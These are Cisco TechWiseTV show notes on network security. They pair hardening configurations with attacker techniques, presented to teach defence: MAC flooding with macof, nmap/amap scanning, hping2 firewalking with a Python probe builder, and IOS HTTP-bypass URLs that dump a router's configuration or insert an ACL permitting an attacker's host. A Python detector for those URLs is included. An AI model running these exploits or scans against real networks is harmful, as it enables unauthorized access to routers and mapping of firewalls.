Cisco Blogs



ShowNotes: Network Security Survival Guide

November 19, 2009 at 12:00 pm PST


TWTV56

Welcome to the Show Notes!  Are you here because you clicked the shownotes link while watching the show?  Or have you not seen the show yet, or just need to share it? All our shows can be found anytime at techwisetv.com, but you can get to the official registration page quite quickly by clicking here.

This is a great one today…you really must watch it. It's security, silly! The topic that just never quits… I apologize that you get to see a lot of Jimmy Ray and me on this one…a few less guests than normal, but we got the goods!  The idea was to really narrow down the control points that still remain when your network is no longer identified by a physical entity or an easily defined perimeter, if you will.  We took advantage of Jimmy Ray's hacker skills and did our best to walk in his shoes: what would he do? Where would he go? We flip it around each time, of course, and show what YOU would do in response….

The promo if you missed it:

Here is what we promised…


Are your routers, switches or perhaps ‘other’ network elements… inadvertently revealing critical information about your network to hackers? Could your firewalls and other security appliances actually be increasing your vulnerability to intruders?

In today's era of borderless networks, minimizing your exposure to outside threats is more essential than ever. Find out how you can reduce the potential attack surfaces available to data thieves without buying any new hardware or software. Our security penetration experts will demonstrate the latest methods employed by hackers to gain access to your network and show you how to eliminate these threats.

Learn the simple, fundamental steps you can take right now to strengthen your network security using the foundational technologies you already have. Discover the valuable free documentation from Cisco that will enable you to implement enterprise customer-proven security strategies and procedures as we reveal:


  • How intruders “firewalk” your firewalls and how to stop them
  • How unused protocols and ports can emit valuable information about your network
  • Why headend routers have suddenly become the “entry point of choice” for hackers and how to lock them down
  • The critical importance of keeping your Cisco IOS Software up to date

Everything is a Target

Robb Boyd - TechWiseTV56

Security has historically been about fences.  We have always wanted to define an edge and be able to state cleanly which side is 'clean' and which side is 'dirty.'  Anything that must pass between the two is of course subject to all manner of inspection, authorization and so forth.  The challenge, of course, is that this does not work in the real world.  It is much too brittle: when it breaks, too many other things fail in the process.  There is quite simply too much gray area.

One logical question that comes up in our 'Building Borderless Networks' series is whether 'Borderless' equals 'insecure.'

Good question I guess…the answer is of course, ‘No.’

The relationship between ‘Constraints’ and ‘Performance.’   

Do you ever hear anyone brag about the brakes on their sports car? It may seem counterintuitive but one could easily argue that brakes may be the most critical element for going fast.  How fast would you drive if you had no brakes?

In the same manner, how fast can your company (or your network) respond to changing conditions? Can you imagine being held back by your technology for fear that a merger, an expansion, new office growth in foreign places, you name it, will leave you overexposed?  The honest truth, and you techies know this: management may not be that fearful, but that lack of fear is not confidence…quite often, it's ignorance.

A borderless network equates to an ability to pursue the right business decisions without regard for the ability of the network to support it.  Each step we take in our ‘Building Borderless Networks’ series adds another important angle to how you can make this a reality.

In today’s show, we look at the borderless network from the outside. A frank look at the attack surface present in a borderless network and the simple things that can be done about it.

Borderless does not mean Exposed.  

We will take each of the fundamental building blocks covered in this series and systematically address how the vulnerabilities can be discovered and the often-simple things that can be done to seal them up. Since this is TechWiseTV, we are not just talking about them, we are going to ‘do them’ so that you can not only understand exactly what is being done but you can easily see how to apply them to your situation.

Jimmy Ray Purser Schools Robb on Yersinia

Segment 2: Turn It Off

Dramatically reduce potential attack surfaces available to intruders by turning off unused ports and protocols.

Grooming a port for Layer 2 deployment:

MAC flooding demo (port security prevents macof and other MAC flooders):
! baseline the CAM table, flood it from the attacker box, then compare
show mac address-table dynamic vlan 1
show mac address-table count
macof                                        ! run on the attacker host, not the switch
show mac address-table count
! find the victim's MAC via ARP and check whether it still has a CAM entry
ping 192.168.1.5
show ip arp 192.168.1.5
show mac address-table address <MAC from the ARP entry above>
(older IOS spells these show mac-address-table)

prevent:
(mac-move notifications go to CS-MARS over SNMP, so the flood is seen and not just blocked)
mac address-table notification mac-move
interface GigabitEthernet1/0/13
 switchport port-security
 ! defaults: one secure MAC, violation mode shutdown; raise the maximum where a phone sits in front of the PC
show port-security interface GigabitEthernet1/0/13

STP:
Root guard (the older way; the port may never become the path toward a superior root):
conf t
interface GigabitEthernet1/0/13
 spanning-tree guard root

BPDU guard (any BPDU arriving on the access port err-disables it):
conf t
interface GigabitEthernet1/0/13
 spanning-tree bpduguard enable
 exit
! bring err-disabled ports back on their own after 30 seconds
errdisable recovery cause bpduguard
errdisable recovery interval 30

DTP:
conf t
interface GigabitEthernet1/0/13
 switchport mode access
 switchport nonegotiate                      ! access mode will not trunk; nonegotiate also stops the port sending DTP frames

DHCP Snooping / IP Source Guard / DAI (Dynamic ARP Inspection):
(This prevents DHCP exhaustion tools like Gobbler, rogue DHCP servers and ARP spoofing)
ip dhcp snooping
ip dhcp snooping vlan 100                    ! must cover the access VLAN of the protected ports below
ip dhcp snooping verify mac-address
ip arp inspection vlan 100                   ! DAI checks ARP against the snooping binding table

! the port toward the real DHCP server must be trusted or its offers are dropped as well
interface <uplink toward the DHCP server>
 ip dhcp snooping trust
 ip arp inspection trust

interface FastEthernet 0/10
 switchport
 switchport mode access
 switchport access vlan 100
 ip verify source                            ! IP Source Guard; ip verify source port-security also binds the MAC

From Jimmy Ray:

Download Yersinia and read my blog entry on how to use it and other hacking tools.

You’ll be surprised how many times the simple web GET works on a router:
http://ip_address_of_router/level/99/exec/show/config
and if it does, you can do stuff like this:
http://ip_address_of_router/level/99/configure/access-list/102/permit/ip/host/my_hacking_machine_IP_addr/any/CR

Oh yeah…the sky's the limit here.
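As an added example (not from the show, not Jimmy Ray's code), here is a small Python check that flags the request shape he describes in web-server, proxy or IDS request logs. IOS privilege levels only run 0 to 15, so a /level/NN/exec or /level/NN/configure path with NN above 15 is a probe for the old IOS HTTP server authorization bypass (CVE-2001-0537), and any /configure/ path arriving over HTTP deserves a look regardless of level. The sample request lines are constructed; 203.0.113.9 stands in for the attacker's address.

```python
from urllib.parse import unquote
import re

# Constructed sample request lines (not captured from a real device). The
# first two mirror the GETs described above; 203.0.113.9 stands in for the
# attacker's machine.
SAMPLE_REQUESTS = [
    "GET /level/99/exec/show/config HTTP/1.0",
    "GET /level/99/configure/access-list/102/permit/ip/host/203.0.113.9/any/CR HTTP/1.0",
    "GET /level/15/exec/show/version HTTP/1.1",
    "GET /level/%36%32/exec/show/running-config HTTP/1.0",  # percent-encoded "62"
    "GET /index.html HTTP/1.1",
]

# IOS HTTP server command URLs look like /level/<priv>/exec/<command words>
# or /level/<priv>/configure/<config words>[/CR]
LEVEL_PATH = re.compile(r"^/level/(\d+)/(exec|configure)(?:/(.*))?$")


def classify(request_line):
    """Return a verdict dict for an IOS-style command URL, or None if the
    request is not one."""
    parts = request_line.split()
    if len(parts) < 2:
        return None
    # decode %xx before matching so an encoded level cannot slip past the regex
    path = unquote(parts[1])
    m = LEVEL_PATH.match(path)
    if not m:
        return None
    level, mode, rest = int(m.group(1)), m.group(2), m.group(3) or ""
    # path segments are the words of the IOS command; a trailing CR is the Enter key
    words = [w for w in rest.split("/") if w and w != "CR"]
    verdict = {"level": level, "mode": mode, "command": " ".join(words)}
    if level > 15:
        # privilege levels are 0-15; anything higher is the bypass probe
        verdict["severity"] = "critical"
        verdict["reason"] = "privilege level outside 0-15 (HTTP authorization bypass probe)"
    elif mode == "configure":
        verdict["severity"] = "high"
        verdict["reason"] = "configuration change through the HTTP server"
    else:
        verdict["severity"] = "info"
        verdict["reason"] = "exec command through the HTTP server"
    return verdict


def scan(lines):
    """Return (line, verdict) pairs for every request that is an IOS command URL."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((line, verdict))
    return hits


if __name__ == "__main__":
    for line, verdict in scan(SAMPLE_REQUESTS):
        print(f"{verdict['severity']:8} level={verdict['level']:<3} "
              f"{verdict['mode']:9} {verdict['command']!r}  {line}")
```

The decode-before-match step matters: a regex on the raw request line would miss the percent-encoded level. The real fix is still the one in the Layer 3 grooming section further down, turning the HTTP server off or restricting it; this check only tells you who has been knocking.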

Jimmy Ray - Animated

Segment 3: Firewalk

How data thieves might actually be using security appliances like your firewalls to help them do their dirty work.

Firewalking:
Discover it with nmap:
nmap -sV -T4 -vv -O 192.168.1.3
nmap -sS -sV -O -p- -Pn 192.168.1.3
(-Pn, spelled -PN on older nmap, skips host discovery, so the old -PI/-PT ping selectors add nothing to it)
I like to feed the results through amap for additional mining:
nmap -sS -oG results.nmap -p 1-65535 TARGET
amap -i results.nmap -o results.amap -m
(-oG is the greppable format amap -i reads; older nmap called it -oM)

Or in one line:
nmap -oG amap.nmap -sT -O -p 1-65535 192.168.0.3; amap -i amap.nmap
Then use hping2 to firewalk it:
hping2 -I eth0 -z -t 6 -S mail.test.com -p 143
(-t 6 starts the SYN with a TTL of the firewall's hop count plus one, and -z lets Ctrl-Z bump the TTL as you go; a TTL-exceeded reply from the hop behind the firewall means it passes port 143, silence means it filters it)
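As an added example, not code from the show or from Cisco, here is the glue a practitioner ends up writing around that pipeline, in Python: it parses nmap's greppable output (the -oG file that amap -i consumes), pulls out the open services for amap and the ports nmap reported as filtered, which are the ones worth firewalking, and builds the hping2 probe with the TTL set one hop past the firewall. The scan text is constructed; the 192.168.1.3 host and the five-hop distance to the firewall are stand-ins.

```python
# Constructed nmap -oG output (not from the show): one host, four ports.
# Each Host line is tab-separated "Key: value" fields; a port entry is
# port/state/proto/owner/service/rpcinfo/version/
SAMPLE_OG = """\
# Nmap 5.00 scan initiated Thu Nov 19 12:00:00 2009 as: nmap -sS -oG results.nmap -p 1-65535 192.168.1.3
Host: 192.168.1.3 ()\tStatus: Up
Host: 192.168.1.3 ()\tPorts: 22/open/tcp//ssh///, 25/open/tcp//smtp///, 143/filtered/tcp//imap///, 443/open/tcp//https//Apache httpd 2.2.3/\tIgnored State: closed (65531)
# Nmap done at Thu Nov 19 12:01:00 2009 -- 1 IP address (1 host up) scanned in 60.00 seconds
"""


def parse_grepable(text):
    """Parse nmap -oG text into {host: [(port, state, proto, service, version), ...]}."""
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines start with '#'
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        host = fields["Host"].split()[0]  # "192.168.1.3 (name)" -> address only
        ports = results.setdefault(host, [])
        for entry in filter(None, fields.get("Ports", "").split(", ")):
            p = entry.split("/")
            ports.append((int(p[0]), p[1], p[2], p[4], p[6]))
    return results


def open_services(results):
    """Open TCP ports as host:port strings, the list you would hand to amap."""
    return [f"{host}:{port}"
            for host, entries in results.items()
            for port, state, proto, _service, _version in entries
            if state == "open" and proto == "tcp"]


def firewalk_candidates(results):
    """Ports nmap could not classify (a filter swallowed the probe or answered
    with an ICMP unreachable). These are the ones to firewalk."""
    return {host: [port for port, state, _proto, _service, _version in entries
                   if state == "filtered"]
            for host, entries in results.items()}


def hping_firewalk_cmd(target, port, gateway_hops, iface="eth0"):
    """Build the hping2 firewalk probe: a SYN whose TTL expires one hop past
    the firewall. A TTL-exceeded reply from that hop means the filter let
    the port through; no reply means it was dropped at the filter."""
    return f"hping2 -I {iface} -z -t {gateway_hops + 1} -S {target} -p {port}"


if __name__ == "__main__":
    scan = parse_grepable(SAMPLE_OG)
    print("amap targets:", open_services(scan))
    for host, ports in firewalk_candidates(scan).items():
        for port in ports:
            # assume (constructed) that traceroute put the firewall 5 hops out
            print(hping_firewalk_cmd(host, port, gateway_hops=5))
```

With the constructed scan the only filtered port is 143, so the script emits the same probe the note above shows, `hping2 -I eth0 -z -t 6 -S 192.168.1.3 -p 143`. Measure the hop count to the firewall with traceroute first; a TTL one short leaves the probe dying at the firewall itself, which looks identical to a filtered port.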

Botnet Traffic Filter initial config (ASA):
! the ASA needs working DNS to download the dynamic database from Cisco
dns domain-lookup outside
dns server-group DefaultDNS
 name-server 172.16.1.4
 domain-name techwisetv.cisco.com
! fetch the dynamic blacklist and use it
dynamic-filter updater-client enable
dynamic-filter use-database
! classify all traffic on the outside interface against the database
! (this logs matches only; dynamic-filter drop blacklist interface outside makes it block)
access-list dynamic-filter_acl extended permit ip any any
dynamic-filter enable interface outside classify-list dynamic-filter_acl
! snoop DNS replies so the filter can tie blacklisted names to the addresses hosts resolve
class-map dynamic-filter_snoop_class
 match port udp eq domain
policy-map dynamic-filter_snoop_policy
 class dynamic-filter_snoop_class
  inspect dns dynamic-filter-snoop
service-policy dynamic-filter_snoop_policy interface outside

Segment 4: In the Air Tonight

Secure the wireless network with integrated radio frequency (RF) intrusion prevention

Chris Kozup


More info on wireless can always be found at go/wireless of course.

Segment 5: Router Leakage

Learn why headend routers have suddenly become the “target of choice” of hackers, how they can be hijacked with a simple web browser application, and how to prevent this from happening.  

Grooming a port for Layer 3 deployment:
no ip source-route                 ! refuse packets that carry their own route through you
no ip gratuitous-arps
no service pad
no ip http server                  ! the browser GETs shown earlier only work while the HTTP server is on; if you need web management use ip http secure-server with ip http authentication
interface GigabitEthernet0/0
 ip verify unicast reverse-path    ! strict uRPF; newer IOS spells it ip verify unicast source reachable-via rx
router rip
 passive-interface default         ! RIP only: RIP still listens, it just stops advertising. With OSPF/EIGRP this also suppresses hellos and the routing process goes quiet, so there un-passive the neighbor-facing links or use a stub configuration instead

Zone Based Firewall example config with support for WAAS:
! tell the firewall that WAAS will be rewriting TCP sequence numbers on redirected flows
ip inspect waas enable
! WCCP service groups must be enabled globally before an interface can redirect into them
ip wccp 61
ip wccp 62
class-map type inspect match-any most-traffic
 match protocol icmp
 match protocol ftp
 match protocol tcp
 match protocol udp
policy-map type inspect p1
 class type inspect most-traffic
  inspect
 class class-default
  drop
zone security zone-hr
zone security zone-outside
zone security z-waas
zone-pair security hr-out source zone-hr destination zone-outside
 service-policy type inspect p1
! in production the outside-to-inside policy should be far narrower than "inspect everything"
zone-pair security out-hr source zone-outside destination zone-hr
 service-policy type inspect p1

interface GigabitEthernet0/0
 description Trusted interface
 ip address 10.70.0.1 255.255.255.0
 ip wccp 61 redirect in
 zone-member security zone-hr

interface GigabitEthernet0/1
 description Untrusted interface
 ip address 10.72.2.3 255.255.255.0
 ip wccp 62 redirect in
 zone-member security zone-outside

interface Integrated-Service-Engine1/0
 ip address 10.70.100.1 255.255.255.252
 ip wccp redirect exclude in
 zone-member security z-waas

Segment 6: Secure Design

Discover the valuable free resources from Cisco that enable you to implement enterprise customer-proven security strategies and solutions.

SAFE  -- Cisco.com/go/safe
Security Intelligence Service
Design Zone


11 Comments.


  1. I am not a techie but try to read and implement security measures for my wireless network. I really like the idea of securing a wireless network with integrated radio frequency intrusion prevention. Having said that, most casual users like me don't even know how to operate a software firewall. There really needs to be an external device that is a plug-and-secure type.

  2. I own a small business and do most of the "IT" work myself, so I'm no expert. I always have concerns about whether my network is secure enough to protect my business. How do I know which router will give me the most protection?

  3. I agree with all the opinions given in your post. Thanks for discussing this. Waiting for your next post like this.

  4. wow, some advanced techniques in the show (for me anyway). Thanks !

  5. Most current routers (especially IOS based ones) would allow any sane person to lock their network hard enough to avoid intrusions. Any public protocol should be kept on a DMZ host outside the private area. The problem these days, though, is not physical security but the vast amount of keyloggers, trojans, etc. and infected websites out there that would, if you get infected, render any physical security you may have on your router a completely wasted effort. My advice: don't ignore virus/malware protection in your network security strategy. Good luck

  6. I am also a business owner who handles most of the technical work “in house”. I need to become more confident in the ability of my firewall and network security. I put trust in my anti-virus & anti-spyware, but I’d like to be surer. Your TV show is probably just what I need. I’ll watch it!

  7. Same as above, the routers are a very important part of today.

  8. Security is indeed a big part of today’s society, or at least it should be.

  11. Network security is really very important nowadays, as many hackers are creeping on other people's important information. Business owners must make their information technology networks secure from these online terrorists.